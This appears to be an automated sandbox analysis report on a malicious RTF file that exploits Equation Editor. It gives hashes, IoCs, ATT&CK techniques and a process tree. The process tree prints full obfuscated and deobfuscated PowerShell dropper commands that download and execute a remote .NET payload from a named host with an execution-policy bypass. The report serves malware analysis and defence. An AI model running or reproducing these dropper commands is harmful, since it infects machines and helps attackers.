e710a319c64ce4faf4f267cbe40505c2a5c86d727a854d5df0c59fd13840fc5c

General

Target

swiftcelsurdoc.rtf
Size

139KB
MD5

bc0afa18a6a091e8114f91ac046ca4ae
SHA1

38b2991fe27e50a799125a2140125604d25652c6
SHA256

e710a319c64ce4faf4f267cbe40505c2a5c86d727a854d5df0c59fd13840fc5c
SHA512

aabe0f79f326b62ce9cd68187d1b962c6a6c4d525a26fe653588c730c96aaa24a65568cdab480ee9783af038b6486e4db7246a2c5b6d11d9ace1a804fe1a3edc
SSDEEP

1536:9n88DGSl0JZ/OTpx8bG+SMKCe6T71AsKJrlCIqmhpxjlBizZIMUGIht0/9jM8sx9:9n9cS+SxXQFYyH9l+TjRI30pXNH

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://cryptersandtools.minhacasa.tv/e/e

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
4	2280	EQNEDT32.EXE
6	2280	EQNEDT32.EXE
8	2736	powershell.exe
9	2736	powershell.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
2280	EQNEDT32.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2416	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1200	powershell.exe
2736	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1200	powershell.exe
Token: SeDebugPrivilege	2736	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2416	WINWORD.EXE
2416	WINWORD.EXE

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2280 wrote to memory of 2056	2280	EQNEDT32.EXE	31
PID 2280 wrote to memory of 2056	2280	EQNEDT32.EXE	31
PID 2280 wrote to memory of 2056	2280	EQNEDT32.EXE	31
PID 2280 wrote to memory of 2056	2280	EQNEDT32.EXE	31
PID 2056 wrote to memory of 1200	2056	WScript.exe	32
PID 2056 wrote to memory of 1200	2056	WScript.exe	32
PID 2056 wrote to memory of 1200	2056	WScript.exe	32
PID 2056 wrote to memory of 1200	2056	WScript.exe	32
PID 1200 wrote to memory of 2736	1200	powershell.exe	36
PID 1200 wrote to memory of 2736	1200	powershell.exe	36
PID 1200 wrote to memory of 2736	1200	powershell.exe	36
PID 1200 wrote to memory of 2736	1200	powershell.exe	36
PID 2416 wrote to memory of 2592	2416	WINWORD.EXE	37
PID 2416 wrote to memory of 2592	2416	WINWORD.EXE	37
PID 2416 wrote to memory of 2592	2416	WINWORD.EXE	37
PID 2416 wrote to memory of 2592	2416	WINWORD.EXE	37

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\swiftcelsurdoc.rtf"
1⤵
- Drops file in Windows directory
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2416
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2592

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2280
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\xetrsfipooxh.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2056
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC⁂Hk⁂d⁂Bl⁂Fs⁂XQBd⁂C⁂⁂J⁂BE⁂Ew⁂T⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂K⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂p⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂GM⁂cgB5⁂H⁂⁂d⁂Bl⁂HI⁂cwBh⁂G4⁂Z⁂B0⁂G8⁂bwBs⁂HM⁂LgBt⁂Gk⁂bgBo⁂GE⁂YwBh⁂HM⁂YQ⁂u⁂HQ⁂dg⁂v⁂GU⁂LwBl⁂Cc⁂KQ⁂p⁂Ds⁂WwBT⁂Hk⁂cwB0⁂GU⁂bQ⁂u⁂EE⁂c⁂Bw⁂EQ⁂bwBt⁂GE⁂aQBu⁂F0⁂Og⁂6⁂EM⁂dQBy⁂HI⁂ZQBu⁂HQ⁂R⁂Bv⁂G0⁂YQBp⁂G4⁂LgBM⁂G8⁂YQBk⁂Cg⁂J⁂BE⁂Ew⁂T⁂⁂p⁂C4⁂RwBl⁂HQ⁂V⁂B5⁂H⁂⁂ZQ⁂o⁂Cc⁂RgBp⁂GI⁂ZQBy⁂C4⁂S⁂Bv⁂G0⁂ZQ⁂n⁂Ck⁂LgBH⁂GU⁂d⁂BN⁂GU⁂d⁂Bo⁂G8⁂Z⁂⁂o⁂Cc⁂VgBB⁂Ek⁂Jw⁂p⁂C4⁂SQBu⁂HY⁂bwBr⁂GU⁂K⁂⁂k⁂G4⁂dQBs⁂Gw⁂L⁂⁂g⁂Fs⁂bwBi⁂Go⁂ZQBj⁂HQ⁂WwBd⁂F0⁂I⁂⁂o⁂Cc⁂d⁂B4⁂HQ⁂LgBw⁂Gk⁂ZgB6⁂HY⁂YgBu⁂C8⁂NQ⁂1⁂C4⁂OQ⁂0⁂C4⁂M⁂⁂x⁂DE⁂Lg⁂5⁂Dc⁂Lw⁂v⁂Do⁂c⁂B0⁂HQ⁂a⁂⁂n⁂Ck⁂KQ⁂=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1200
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://cryptersandtools.minhacasa.tv/e/e'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.pifzvbn/55.94.011.97//:ptth'))"
      4⤵
      Blocklisted process makes network request
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2736

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Exploitation for Client Execution

1

T1203

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
20KB

MD5
2a89aecbaebde85dcaf7325fb1e39db5

SHA1
4f284806a746ca55786251c0b244a0d6b3804796

SHA256
a7879511c4d8383801aa695fd1ec5dd2f2a60c8c471469f973b368608130b619

SHA512
2fcf0f3cdd7b9d6f175cd4bdc1b56376f3cc8354e823f5cd8bdb13f77943dcef080430554b62add8d50fbfb4a855a1a09f6fa042fd8d5237f00a12c9b67c3d07

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ILEL1SZDSC7V5SK7DJA8.temp

Filesize
7KB

MD5
de04a786d24341248df354b10be41f02

SHA1
d9125edd4cb2efd1c21404b18537cb2094922740

SHA256
7756f1994d58ed1dea28e5b14bdda574d3623df90d88c61df7df61b3f2112965

SHA512
9e8e10e5f9c9c6d054e199215a7187dc991f9b14617eab5255f9a6ccffd9043549f6fa044ab5a7fc3494d3f615245157a0707bc8c80681578fb7019d00fd3d3f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
de04a786d24341248df354b10be41f02

SHA1
d9125edd4cb2efd1c21404b18537cb2094922740

SHA256
7756f1994d58ed1dea28e5b14bdda574d3623df90d88c61df7df61b3f2112965

SHA512
9e8e10e5f9c9c6d054e199215a7187dc991f9b14617eab5255f9a6ccffd9043549f6fa044ab5a7fc3494d3f615245157a0707bc8c80681578fb7019d00fd3d3f

Download Submit
C:\Users\Admin\AppData\Roaming\xetrsfipooxh.vbs

Filesize
319KB

MD5
d8d6c606173495583115e3eca5832be9

SHA1
4d1fa9b6753b4931ed7edfa34578dd22cf49a700

SHA256
bea5d51a44b6699ff043739a63a853b4eb7d9db8bb393909a850cfe3da73cc6d

SHA512
8260a07fde1d767a945572bb8123cefa79c0bc0879ebf44592a5dce7f668749efbbf96dbd07eaa81f2af33393b6ae234acfca8168c0834111828245ff5e8ea90

Download Submit
C:\Users\Admin\AppData\Roaming\xetrsfipooxh.vbs

Filesize
319KB

MD5
d8d6c606173495583115e3eca5832be9

SHA1
4d1fa9b6753b4931ed7edfa34578dd22cf49a700

SHA256
bea5d51a44b6699ff043739a63a853b4eb7d9db8bb393909a850cfe3da73cc6d

SHA512
8260a07fde1d767a945572bb8123cefa79c0bc0879ebf44592a5dce7f668749efbbf96dbd07eaa81f2af33393b6ae234acfca8168c0834111828245ff5e8ea90

Download Submit
memory/1200-83-0x0000000002500000-0x0000000002540000-memory.dmp

Filesize
256KB

Download
memory/1200-84-0x0000000002500000-0x0000000002540000-memory.dmp

Filesize
256KB

Download
memory/2416-54-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2416-116-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2736-90-0x0000000005110000-0x0000000005148000-memory.dmp

Filesize
224KB

Download

Analysis

Sharing